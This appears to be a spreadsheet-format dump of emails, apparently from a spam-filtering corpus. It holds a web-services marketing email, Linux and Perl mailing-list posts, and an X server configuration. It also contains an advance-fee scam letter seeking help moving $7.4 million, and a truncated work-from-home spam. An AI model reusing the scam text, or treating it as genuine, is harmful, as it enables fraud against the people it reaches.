 E-shop is a multi-platform e-commerce solution for Retailers, Wholesalers, or any company wanting to sell on the Internet.  This e-commerce solution can be used as a business-to-business consumer solution.  E-Shop will support any number of products since its data is stored in SQL tables.
 Corporate Profile
 Com-Pro Systems, Inc., founded in 1990, is a successful information technology consulting firm providing products and services across several industries.  Com-Pro Systems' goal is to become the leader in software development. 
 CSI will deliver the entire solution.  By leveraging our relationships with companies like IBM, Microsoft, Compaq, AT&amp;T, Cisco and others we bring you the best cross platform solutions to your Hardware, Software and Hosting needs.
   Copyright C 2001, Com-Pro Systems, Inc. (All rights reserved)
 --= Multipart Boundary 0731021742
 Content-Type: text/html;
 	charset="ISO-8859-1"
 Content-Transfer-Encoding: 8bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META NAME="GENERATOR" Content="Microsoft DHTML Editing Control"&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" bgColor=#ffffff border=0&gt;
   &lt;TR&gt;
     &lt;TD width="100%"&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=747 border=0&gt;
         &lt;TR&gt;
           &lt;TD width=339 bgColor=#ffffff height=1&gt;&lt;IMG height=3 
             src="http://www.comprosys.com/email/blank_tall.gif" width=1 
           border=0&gt;&lt;/TD&gt;
           &lt;TD width=123 bgColor=#ffffff height=1&gt;&lt;IMG height=3 
             src="http://www.comprosys.com/email/blank_tall.gif" width=1 
           border=0&gt;&lt;/TD&gt;
           &lt;TD width=285 bgColor=#ffffff height=1&gt;&lt;IMG height=3 
             src="http://www.comprosys.com/email/blank_tall.gif" width=1 
           border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=339&gt;&lt;A href="http://www.comprosys.com"&gt;&lt;IMG height=43 
             src="http://www.comprosys.com/email/headeraa.gif" width=339 
             border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=123&gt;&lt;IMG height=43 
             src="http://www.comprosys.com/email/homeff.gif" width=123 
           border=0&gt;&lt;/TD&gt;
           &lt;TD width=285 bgColor=#ffffff&gt;&lt;IMG height=43 hspace=3 
             src="http://www.comprosys.com/email/headercc.gif" width=265 
           border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=339 bgColor=#0030a0 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1
 border=0&gt;&lt;/TD&gt;
           &lt;TD width=123 bgColor=#0030a0 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1
 border=0&gt;&lt;/TD&gt;
           &lt;TD width=285 bgColor=#0030a0 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1 
         border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=339&gt;&lt;IMG height=26 
             src="http://www.comprosys.com/email/headerbb.gif" width=339 
           border=0&gt;&lt;/TD&gt;
           &lt;TD width=123&gt;&lt;IMG height=26 
             src="http://www.comprosys.com/email/homegg.gif" width=123 
           border=0&gt;&lt;/TD&gt;
           &lt;TD width=285 bgColor=#ffffff&gt;&lt;IMG height=26 
             src="http://www.comprosys.com/email/headerdd.gif" width=179 
           border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=339 bgColor=#0030a0 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1
 border=0&gt;&lt;/TD&gt;
           &lt;TD width=123 bgColor=#0030a0 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1
 border=0&gt;&lt;/TD&gt;
           &lt;TD width=285 bgColor=#0030a0 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1 
         border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=339 bgColor=#ffffff&gt;&lt;FONT color=#ffffff
 size=1&gt;-&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width=123&gt;&lt;FONT size=1&gt;&lt;IMG height=17 
             src="http://www.comprosys.com/email/homehh.gif" width=123 
             border=0&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width=285 bgColor=#ffffff&gt;&lt;FONT size=1&gt;&lt;IMG height=17 
             src="http://www.comprosys.com/email/headeree.gif" width=122 
             border=0&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=339 bgColor=#ff9c30 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1
 border=0&gt;&lt;/TD&gt;
           &lt;TD width=123 bgColor=#ff9c30 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1
 border=0&gt;&lt;/TD&gt;
           &lt;TD width=285 bgColor=#ff9c30 height=1&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1 
         border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=747 bgColor=#ff9c30 colSpan=3 height=1&gt;
             &lt;P align=center&gt;&lt;B&gt;&lt;FONT color=#ffffff&gt;NEED A PROFESSIONAL 
             LOOKING&amp;nbsp; WEBSITE?&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=748 border=0&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=340&gt;
             &lt;TABLE cellPadding=3 width="96%" bgColor=#ffffff border=0&gt;
               &lt;TR&gt;
                 &lt;TD width="100%" bgColor=#ffffff&gt;
                   &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana color=#000080 size=2&gt;Custom
 Website 
                   Development&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
                   &lt;P&gt;&lt;FONT face=Verdana size=1&gt;We can create new web pages
 or 
                   give your existing pages a "face-lift" to bring them up
 to the 
                   Internet's latest trends and standards.&amp;nbsp; We are 
                   experienced at writing HTML and can provide custom
 programming 
                   in CGI, JavaScripts, Java Server Pages, Active Server
 Pages 
                   and ActiveX, which we can use to give your site the
 dynamics 
                   and interactivity of a cutting edge web presence.&lt;BR&gt;&lt;A 
                   href="http://www.comprosys.com/development.jsp" 
                   target=_blank&gt;&lt;IMG height=12 
 src="http://www.comprosys.com/email/alex_email_task/more.gif" 
                   width=38 border=0&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
                   &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana color=#000080 size=2&gt;E-Mail and
 Web 
                   Hosting&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;&lt;/P&gt;
                   &lt;TABLE width="100%" border=0&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top align=middle width="9%"&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=1&gt;&lt;B&gt;&lt;FONT class=titpeq 
                         color=#ff6600&gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                       &lt;TD width="91%"&gt;&lt;FONT face=Verdana size=1&gt;Unlimited 
                         technical customer support
 via&amp;nbsp;e-mail&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top align=middle width="9%"&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=1&gt;&lt;B&gt;&lt;FONT class=titpeq 
                         color=#ff6600&gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                       &lt;TD width="91%"&gt;&lt;FONT face=Verdana size=1&gt;Web
 hosting- 
                         50MB storage&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top align=middle width="9%"&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=1&gt;&lt;B&gt;&lt;FONT class=titpeq 
                         color=#ff6600&gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                       &lt;TD width="91%"&gt;&lt;FONT face=Verdana size=1&gt;10 e-mail 
                         accounts&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top align=middle width="9%"&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=1&gt;&lt;B&gt;&lt;FONT class=titpeq 
                         color=#ff6600&gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                       &lt;TD width="91%"&gt;&lt;FONT face=Verdana size=1&gt;Unlimited 
                         e-mail forwards&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top align=middle width="100%" colSpan=2&gt;
                         &lt;P align=left&gt;&lt;FONT face=Verdana size=1&gt;For
 &lt;/FONT&gt;&lt;FONT 
                         face=Verdana size=5&gt;&lt;B&gt;$29.95&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                         face=Verdana size=1&gt; monthly.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top align=middle width="100%" colSpan=2&gt;
                         &lt;P align=left&gt;&lt;FONT face=Verdana size=1&gt;First
 month Free 
                         with purchase of new 
                   website!!&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;P&gt;&lt;BR&gt;&amp;nbsp;&lt;BR&gt;&lt;/P&gt;
                   &lt;TABLE id=AutoNumber3 style="BORDER-COLLAPSE: collapse" 
                   borderColor=#111111 cellSpacing=0 cellPadding=0
 width="100%" 
                   border=0&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top width="46%"&gt;
                         &lt;P align=center&gt;&lt;FONT color=#000080&gt;&lt;IMG height=141 
 src="http://www.comprosys.com/email/alex_email_task/pic_02.jpg" 
                         width=115 border=0&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
                       &lt;TD vAlign=center width="54%"&gt;
                         &lt;P align=left&gt;&lt;FONT face=Verdana size=1&gt;From server 
                         setup to content development, we offer the
 complete Web 
                         solution, which is further enhanced by the
 services of 
                         our carefully chosen strategic partners who provide 
                         everything from development tools to hosting 
                         services.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;P&gt;&lt;BR&gt;&lt;/P&gt;
                   &lt;HR color=#0030a0 SIZE=1&gt;
                   &lt;BLOCKQUOTE&gt;
                     &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana color=#000000 
                     size=2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=Verdana color=#000000
 size=1&gt;If 
                     you prefer not to receive future news and information
 on our 
                     technology solutions, please reply to this message
 with &lt;A 
 href="mailto:unsubscribe@comprosys.com?subject=unsubscribe"&gt;UNSUBSCRIBE&lt;/A&gt; 
                     in the subject.&lt;/FONT&gt;&lt;FONT face=Verdana color=#000000 
                     size=2&gt;&lt;BR&gt;&lt;BR&gt;&lt;IMG height=43 
                     src="http://www.comprosys.com/email/csi_logo.gif"
 width=107 
                     border=0&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Verdana color=#000000 
                     size=1&gt;&lt;BR&gt;2200 N.W. 102nd Ave. Suite 4 &lt;BR&gt;Miami, FL 
                     33172&lt;BR&gt;Tel: +1 (305) 594-3474&amp;nbsp; &lt;BR&gt;Fax: +1 (305) 
                     594-9655&lt;BR&gt;Toll Free:
 1-888-8-COM-PRO&lt;B&gt;&lt;BR&gt;&lt;/B&gt;Web:&lt;B&gt; &lt;A 
                     href="http://www.comprosys.com/web_template.jsp"&gt;&lt;FONT 
 color=#0000ff&gt;www.comprosys.com&lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;FONT 
                     face=Verdana size=1&gt;e-mail:&lt;B&gt; &lt;A 
                     href="mailto:info@comprosys.com"&gt;&lt;FONT 
 color=#0000ff&gt;info@comprosys.com&lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/BLOCKQUOTE&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ff9c30&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1
 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top width=408&gt;
             &lt;TABLE cellPadding=3 width="101%" bgColor=#ffffff border=0&gt;
               &lt;TR&gt;
                 &lt;TD width="100%" bgColor=#ffffff&gt;&lt;FONT face=Verdana 
                   color=#000080 size=2&gt;&lt;B&gt;Web
 Templates&lt;BR&gt;&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                   face=Verdana size=2&gt;&lt;B&gt;Starting from just 
                   $&lt;STRIKE&gt;499&lt;/STRIKE&gt;! &lt;FONT color=#ff0000&gt;&lt;BR&gt;$399 If
 your 
                   order is placed by 8/15/2002.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                   face=Verdana size=1&gt;&lt;BR&gt;Our Web templates give you the
 way to 
                   get on the Internet with a very professional look and
 feel 
                   while keeping the costs down. Contact us for your 
                   options.&lt;BR&gt;&lt;BR&gt;How does it work? Easy as 1-2-3...&lt;BR&gt;1) 
                   Register on our site and select a username and password,
 this 
                   will allow you to track your website development project
 start 
                   to finish.&lt;BR&gt;2) Fill out the questionnaire, this will
 help 
                   you to get all the materials needed for us to develop
 your 
                   site. It is very important to fill out all the 
                   questions.&lt;BR&gt;3) We will then setup your website
 according to 
                   the information given to us. That's it !&lt;BR&gt;&lt;A 
                   href="http://www.comprosys.com/web_template.jsp" 
                   target=_blank&gt;&lt;IMG height=12 
 src="http://www.comprosys.com/email/alex_email_task/more.gif" 
                   width=38 border=0&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;If you would prefer a
 custom 
                   solution we will be happy to create a completely custom 
                   solution for you. Contact us for a free
 quote.&lt;/FONT&gt;&lt;BR&gt;&lt;FONT 
                   face=Verdana size=1&gt;&lt;A 
                   href="http://www.comprosys.com/contact_form.jsp" 
                   target=_blank&gt;&lt;IMG height=12 
 src="http://www.comprosys.com/email/alex_email_task/more.gif" 
                   width=38 border=0&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&amp;nbsp;
                   &lt;P align=center&gt;&lt;IMG height=245 
                   src="http://www.comprosys.com/email/ebiz2.jpg" width=345 
                   border=0&gt;&lt;BR&gt;&lt;/P&gt;
                   &lt;HR color=#0030a0 SIZE=1&gt;
                   &lt;P align=left&gt;&lt;B&gt;&lt;FONT face=Verdana color=#000080
 size=2&gt;Sell 
                   Your Products On-Line&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
                   &lt;TABLE width="101%" border=0&gt;
                     &lt;TR&gt;
                       &lt;TD width="63%"&gt;&lt;FONT face=Verdana size=1&gt;&lt;A 
                         href="http://www.comprosys.com/e_shop.jsp" 
                         target=_blank&gt;&lt;IMG height=44 
 src="http://www.comprosys.com/email/alex_email_task/csi_eshop_logo.gif" 
                         width=117 align=right border=0&gt;&lt;/A&gt;E-shop is a 
                         multi-platform e-commerce solution for Retailers, 
                         Wholesalers, or any company wanting to sell on the 
                         Internet.&amp;nbsp; This e-commerce solution can be
 used as 
                         a business-to-business consumer solution.&amp;nbsp;
 E-Shop 
                         will support any number of products since its data
 is 
                         stored in SQL tables.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;P&gt;&lt;FONT face=Verdana size=1&gt;&lt;A 
                   href="http://www.comprosys.com/e_shop.jsp"
 target=_blank&gt;&lt;IMG 
                   height=12 
 src="http://www.comprosys.com/email/alex_email_task/more.gif" 
                   width=38 
 border=0&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
       &lt;TABLE style="BORDER-TOP-WIDTH: 0px" height=66 cellSpacing=0
 cellPadding=0 
       width=804 border=0&gt;
         &lt;TR&gt;
           &lt;TD style="BORDER-TOP: 1px solid" borderColor=#ff6600 
           borderColorLight=#ff6600 width=43 bgColor=#ffd19f height=43&gt;&lt;IMG 
             height=1 src="http://www.comprosys.com/email/blank.gif" width=1 
             border=0&gt;&lt;/TD&gt;
           &lt;TD style="BORDER-TOP: 1px solid" vAlign=top borderColor=#ff6600 
           borderColorLight=#ff6600 width=704 bgColor=#ffffff 
             height=43&gt;&lt;B&gt;&lt;FONT face=Verdana color=#000080 size=2&gt;Corporate 
             Profile&lt;/FONT&gt;&lt;FONT face=Verdana color=#0030a0 
             size=2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=Verdana color=#000000
 size=1&gt;Com-Pro 
             Systems, Inc., founded in 1990, is a successful information 
             technology consulting firm providing products and services
 across 
             several industries.&amp;nbsp; Com-Pro Systems' goal is to become
 the 
             leader in software development.&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Verdana
 size=1&gt; 
             &lt;/FONT&gt;
             &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana color=#000000 size=1&gt;CSI will deliver
 the 
             entire solution.&amp;nbsp; By leveraging our relationships with 
             companies like IBM, Microsoft, Compaq, AT&amp;amp;T, Cisco and
 others we 
             bring you the best cross platform solutions to your Hardware, 
             Software and Hosting needs.&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD style="BORDER-BOTTOM: 1px solid" vAlign=top width=57 
           bgColor=#ffffff height=43&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD style="BORDER-TOP: 1px solid" borderColor=#0030a0 
           borderColorLight=#0030a0 width=43 height=20&gt;&lt;IMG height=1 
             src="http://www.comprosys.com/email/blank.gif" width=1
 border=0&gt;&lt;/TD&gt;
           &lt;TD style="BORDER-TOP: 1px solid" borderColor=#0030a0 
           borderColorLight=#0030a0 align=right width=704 bgColor=#ffffff 
           height=20&gt;
             &lt;P align=left&gt;&lt;FONT color=#0030a0&gt;&amp;nbsp;&lt;FONT face=Verdana
 size=1&gt; 
             Copyright C 2001, Com-Pro Systems, Inc. (All rights 
             reserved)&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD style="BORDER-TOP: 1px solid" borderColor=#0030a0 
           borderColorLight=#0030a0 align=right width=57 bgColor=#ffffff 
           height=20&gt;&lt;A href="mailto:info@comprosys.com"&gt;&lt;IMG height=15 
             src="http://www.comprosys.com/email/email01.gif" width=57 
             border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 --= Multipart Boundary 0731021742--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] log problem
</t>
  </si>
  <si>
    <t xml:space="preserve">I just set up razor and spamassassin, but I keep getting this error in my 
 mail log file
 razor2 check skipped: No such file or directory Can't call method "log" on 
 unblessed reference at 
 /usr/local/lib/perl5/site_perl/5.8.0/Razor2/Client/Agent.pm line 212.
 I have looked through the archived list and the only thing I have seen 
 about this error is a possible permission problem on the log file.
 I did what it said in the archives, basically change the permission on the 
 file but its still no go.
 Any other help would be appreciated, maybe I'm missing something.
 something I forgot to run or do.
 rob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</si>
  <si>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[use Perl] Headlines for 2002-08-30
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Installing Perl 5.8.0 on Mac OS X 10.2
     posted by pudge on Thursday August 29, @15:03 (releases)
     http://use.perl.org/article.pl?sid=02/08/29/193225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</si>
  <si>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Dave Long wrote:
 &gt;&gt;&lt;http://www.iht.com/articles/72079.htm&gt;
 &gt;&gt;    
 &gt;&gt;
 &gt;&gt;&gt;"The United States is the only country in the world to tax its citizens
 &gt;&gt;&gt;on a worldwide basis, ...
 &gt;&gt;&gt;      
 &gt;&gt;&gt;
 &gt;
 &gt;I am told this is also true (at least)
 &gt;for Australia.  I suppose I shouldn't
 &gt;rely upon editorial fact-checking.
 &gt;
 &gt;::::::
 &gt;
 &gt;  
 &gt;
 &gt;&gt;                              If they manage to emulate the process
 &gt;&gt;that occurred in Northern Ireland, then maybe in 20 years or so
 &gt;&gt;they'll be yelling at each other across the floor of some legislative
 &gt;&gt;assembly instead.  Label me an optimist.
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Since "let's you and him fight" worked
 &gt;so remarkably poorly in Ireland, there
 &gt;must've been plenty of places it worked
 &gt;well for the British to have tried it
 &gt;again in Israel.  What were they?
 &gt;
 &gt;-Dave
 &gt;  
 &gt;
 I'm not sure what you mean by "let's you and him fight", but it is 
 important to remember that England was in control of Ireland
 for 300 years, and that it was only thanks to the distraction of WW I 
 that the south managed to gain its independence. If you mean
 splitting countries upon arbitrary lines and assigning different groups 
 to opposite sides of the line, it also seems to have not worked in
 India/Pakistan.
 I suppose Canada, which is supposed to be a "loose confederation" of 2 
 founding nations (French and English) can be cited as a success. The 
 jury is still out, but so far only a few brief rebellions and 
 referendums and such, still together after 130+ years.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">JoeBar wrote:
 &gt;C is more reliable than Java??
 Depends who writes it.  One guy will write a bug every 5 lines,
 another every 5000 lines.  Put them both on a project and that will
 average out to a bug every 4.995 lines.
 &lt;observation type=trivial&gt;(Irrespective of language.  Pick the one
 that best suits what you're trying to do.)&lt;/observation&gt;
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Iraq invasion could 'worsen terrorist threat'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8015194,1440/
 Date: Not supplied
 An influential think tank warns that "regime change" could disperse weapons 
 stockpiles into the murky world of global terrorism
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DANIEL  KARGBO. fork !
</t>
  </si>
  <si>
    <t xml:space="preserve"> fork ,
 From;Mr.David  Kargbou and Family,
          Johannesburg,South Africa.
 My Dear ,
 Good day.This very confidential request should come as a surprise to you.But it is because of the nature of what is happening to me and my family urged me to contact you, and I quite understand that this is not the best way to contact you because of the nature of my request and the attention it requires.I got your contact information from your country's information directory during my desperate search for someone who can assist me secretly and confidentially in relocating and managing some family fortunes.
 My name is Mr.David  Kargbou,the second son of Mr.Smith Thabo Kargbou,of Beitbridge Zimbabwe.At the height of the present political crises in our country,in which the white farmers in our country are being slained and ripped off their belongings by the supporters of our president,Mr.Robert G.Mugabe,in their efforts to reclaim all the white owned farms in our country,my father and my elder brother were brutally slained to a painful death on the 13th of february,2002, in their struggle to protect some white farmers who ran to take refuge in our house.My father,during his life on earth was a prominent business man who trades on diamond and gold from some foreign countries .He publicly opposes the crude policies and crime against humanity on the white farmers by Mr.Robert Mugabe and his followers,which they enforced media law restrictions to protect their wicked acts.That not being enough,the president and his followers after winning the la
  st undemocratic elections decided to block and confiscate all accounts and assets of our black indigenes[that included my fathers assets and accounts] who oppose his policies and render support to these white farmers,along with the assets of these white farmers themselves,that are being presently confiscated.I therefore decided to move my mother and younger sister to the Republic of South Africa,where we presently live without anything and without any source of livelyhood.
 During my fathers life on earth,he had deposited the sum of Seven Million and Four Hundred Thousand United States Dollars[$7.400.000.00]in a Trunk box with a Finance and Security Company in the Republic of Togo for a cash and carry Diamond and Gold business with some foreign business customers, awaiting instructions to be moved to its destination,which he never completed before he met his untimely death on that faithful day.In view of this and as the only surviving son of my father,and with the present clamp down,killing and confiscation of his assets as one of those who render support to the white farmers in our country,I therefore humbly wish to inform you of my intentions to use your name and adress in making sure that this fund is lifted out of Africa finally,to the Europe office of the finance company and also seek for your honest and trustworthy assistance to help me clear and accommodate this money over there before it is dictated out and bloc
  ked by the present Mugabe's regime.My mother is presently with the valid document covering this deposit.
 Now this is what I actually want you to do for me;
 1. I want you to be presented to the Finance and Security company as the person I contacted to assist my family for this purpose, with whose name and adress myself and my mother will forward to them their office in the Republic of Togo as the person that will clear this money when they lift it out to their europe office.
 2. To finally assist me in accommodating and managing this money in any lucrative business in your country for at least three years. 
 Please,I hope you will grant and view this very request with favour and much understanding of our situation now,and will be a very honest and reliable person to deal with.And also bearing in mind the confidential nature of this my request,I emphasize please that you keep every bit of it to yourself so as to protect my familys future and yourself rendering this help.Thanking you in anticipation of your urgent response as soon as you read this very request.
 Best Regards, 
 Mr.David Kargbou and family. 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] [OT] Oceanfree Dial-up Number
</t>
  </si>
  <si>
    <t xml:space="preserve">I've found that while my win2k box doesnt care what username/passwd it uses
 the linux box wont work except using oceanfree/oceanfree. Whether this is a
 machine or oceanfree issue I leave to yourself to decide.
 -----Original Message-----
 From: Robert Synnott [mailto:r.synnott@oceanfree.net]
 Sent: 27 July 2002 11:39
 To: Liam Bedford; ilug@linux.ie
 Subject: Re: [ILUG] [OT] Oceanfree Dial-up Number
 Actually, they do; though they aren't case sensitive. It seems to have some 
 trouble wtih PAP/CHAP authentication  as well; you might have to do it by 
 script?
 On Friday 26 July 2002 12:37, Liam Bedford wrote:
 &gt; On Fri, 26 Jul 2002 12:23:24 +0100
 &gt;
 &gt; HAMILTON,DAVID (HP-Ireland,ex2) claiming to think:
 &gt; &gt; Hi All,
 &gt; &gt;
 &gt; &gt; I am trying to find the Oceanfree ISDN dialup number for Dublin.
 &gt; &gt; http://iiu.taint.org/ appears to be down, or at least I can't get to it,
 &gt; &gt; and I don't want to pay oceanfree 10 per second for tech support :-).
 &gt;
 &gt; 01-2434321
 &gt; username: oceanfree
 &gt; password: oceanfree
 &gt;
 &gt; don't think the username and password matter much though.
 &gt;
 &gt; L.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</si>
  <si>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Re: [ILUG] Newbie seeks advice - Suse 7.2
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt; &gt;
 &gt; I downloaded a driver from the nVidia website and installed it using RPM.
 &gt; Then I ran Sax2 (as was recommended in some postings I found on the net),
 but
 &gt; it still doesn't feature my video card in the available list. What next?
 hmmm.
 Peter.
 Open a terminal and as root type
 lsmod
 you want to find a module called
 NVdriver.
 If it isn't loaded then load it.
 #insmod NVdriver.o
 Oh and ensure you have this module loaded on boot.... else when you reboot
 you might be in for a nasty surprise.
 Once the kernel module is loaded
 #vim /etc/X11/XF86Config
 in the section marked
 Driver I have "NeoMagic"
 you need to have
 Driver "nvidia"
 Here is part of my XF86Config
 Also note that using the card you are using you 'should' be able to safely
 use the FbBpp 32 option .
 Section "Module"
  Load  "extmod"
  Load  "xie"
  Load  "pex5"
  Load  "glx"
  SubSection "dri"    #You don't need to load this Peter.
   Option     "Mode" "666"
  EndSubSection
  Load  "dbe"
  Load  "record"
  Load  "xtrap"
  Load  "speedo"
  Load  "type1"
 EndSection
 #Plus the Modelines for your monitor should be singfinicantly different.
 Section "Monitor"
  Identifier   "Monitor0"
  VendorName   "Monitor Vendor"
  ModelName    "Monitor Model"
  HorizSync    28.00-35.00
  VertRefresh  43.00-72.00
         Modeline "800x600" 36 800 824 896 1024 600 601 603 625
  Modeline "1024x768" 49 1024 1032 1176 1344 768 771 777 806
 EndSection
 Section "Device"
  Identifier  "Card0"
  Driver      "neomagic" #Change this to "nvidia"... making sure the modules
 are in the correct path
  VendorName  "Neomagic" # "Nvidia"
  BoardName   "NM2160"
  BusID       "PCI:0:18:0"
 EndSection
 Section "Screen"
  Identifier "Screen0"
  Device     "Card0"
  Monitor    "Monitor0"
  DefaultDepth 24
  SubSection "Display"
   Depth     1
  EndSubSection
  SubSection "Display"
   Depth     4
  EndSubSection
  SubSection "Display"
   Depth     8
  EndSubSection
  SubSection "Display"
   Depth     15
  EndSubSection
  SubSection "Display"
   Depth     16
  EndSubSection
  SubSection "Display"
   Depth     24
   #FbBpp   32 #Ie you should be able lto uncomment this line
   Modes   "1024x768" "800x600" "640x480" # And add in higher resulutions as
 desired.
  EndSubSection
 EndSection
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">[Neale Pickett]
 &gt; And then, just as I was about to fall asleep, I figured it out.  The
 &gt; tokenizer now has an extra [:], and all is well.  I feel like a real
 &gt; chawbacon for not realizing this earlier.  :*)
 Good eye, Neale!  Thanks for the fix.
 &gt; Blaming it on staying up past bedtime,
 Blame it on Barry.  I do &lt;wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Earn 100.000$ in one year working at home
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello
 You may have seen this business before and
 ignored it. I know I did - many times! However,
 please take a few moments to read this letter.
 I was amazed when the profit potential of this
 business finally sunk in... and it works!
 With easy-to-use e-mail tools and opt-in e-mail,
 success in this business is now fast, easy and
